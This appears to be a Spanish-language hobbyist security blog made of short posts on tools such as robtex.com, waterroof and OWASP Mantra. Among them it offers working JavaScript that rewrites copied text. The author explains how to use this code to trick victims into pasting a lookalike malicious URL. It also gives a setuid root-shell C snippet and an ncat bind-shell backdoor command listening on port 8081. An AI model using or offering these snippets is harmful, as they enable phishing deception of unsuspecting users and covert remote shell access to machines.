La Navaja Suiza de Internet

Si Netcat es la navaja suiza de las redes tcp/ip robtex.com se presenta como la navaja suiza de Internet, mas específicamente de los dominios y mapeo de la misma.


Nos proporciona información de las redes, rutas, servidores, DNS, país, así como las ips y dominios relacionados, además de muchos más datos que obtendremos a partir tan solo de una ip o un nombre de dominio. También si esta en alguna lista negra y dominios parecidos que están en venta y su precio.

Parte de la información es proporcionada por otras fuentes de Internet como Alexa, Sedo, radb . Una buena herramienta para empezar a buscar información sobre un sitio de Internet.

Codigo para modificar texto copiado al pegarlo

Este código de javascript hará que se añada un texto antes y después del texto copiado de nuestra web.


<script type="text/javascript">

function addLink() {

    var body_element = document.getElementsByTagName('body')[0];

    var selection;

    selection = window.getSelection();

    var pagelinkdespues= "Este mensaje esta despues del texto copiado";

    var pagelinkantes = "Este mensaje esta antes del texto copiado";

    var copytext = pagelinkantes + selection+ pagelinkdespues;

    var newdiv = document.createElement('div');

    newdiv.style.position='absolute';

    newdiv.style.left='-99999px';

    body_element.appendChild(newdiv);

    newdiv.innerHTML = copytext;

    selection.selectAllChildren(newdiv);

    window.setTimeout(function() {

    body_element.removeChild(newdiv);

    },0);

}

document.oncopy = addLink;

</script>



Aparte de por ejemplo añadir un mensaje de copyrigth al final de cada texto copiado/pegado surgen algunas posibilidades mas como hacer creer a alguien que no funciona el link en un mail o una web que enlaza con una pagina web y aparece el tipico mensaje avisando que si no funciona el link copie y pegue la URL a su navegador. La víctima piensa que ha copiado una URL de confianza (http://www.google.com) pero al pegarla en el navegador para conectarse a ella la dirección URL es la que nosotros hemos añadido al código javascript. Si además es parecida a la dirección de confianza (htttp://www.gooogle.com o http://gooie.com) (si son ejemplos muy tontos, pero son eso ejemplos) no comprobara letra a letra que no es la web que quería visitar y se conectara sin saberlo a la web maliciosa que tengamos diseñada para continuar con el engaño.


Código sacado de http://spirate.net/foro/tutoriales-de-ayuda/anade-mensaje-a-la-hora-de-que-copien-algo-de-tu-web/?action=printpage despues de investigar el texto de Copyright añadido al copiar/pegar en la web http://papilyn.com/ .

pequeño codigo para pequeños stoor

:~/$cat > shell.c # codigo
main(){
setuid(0);
setgid(0);
system("/bin/bash");

:~/$ gcc -o shell shell.c # compilacion

:~/$ sudo ./shell # ejecucion
Password:
:~/Desktop#
:~/Desktop# whoami # comprobacion
root


copiado de http://zodiac-mitm.blogspot.com/

Ncat backdoor

ncat --exec "/bin/bash" -l 8081 --keep-open &


Más usos de esta hermosa herramienta en el tutorial de irongeek .

waterroof o como configurar el firewall del Mac OS X facilmente

waterroof es una aplicacion para macos x que te permitira configurar el firewall que trae el propio sistema operativo desde una consola grafica.

OWASP Mantra el navegador para Pen Testers

OWASP Mantra es un navegador para Linux, Windows y Mac que viene con una coleccion de herramientas para los profesionales de la seguridad o para los que como yo les gusta trastear integradas en el. Tambien es una buena herramienta para diseñadores y programadores de aplicaciones web. Es muy completo y muy amplio, por defecto ya vienen instalados unos cuantos de los mejores addons para firefox llegando incluso a traer unas cuantas paginas web en la carperta de marcadores muy interesantes desde manuales hasta páginas de wargames.